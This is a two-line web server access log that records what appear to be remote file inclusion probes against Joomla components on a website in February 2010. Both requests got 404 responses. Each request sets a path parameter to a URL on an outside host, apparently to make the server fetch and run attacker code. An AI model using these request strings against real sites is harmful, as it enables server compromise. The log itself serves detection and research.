211.115.213.195 - - [10/Feb/2010:07:05:10 -0800] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:09:43 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
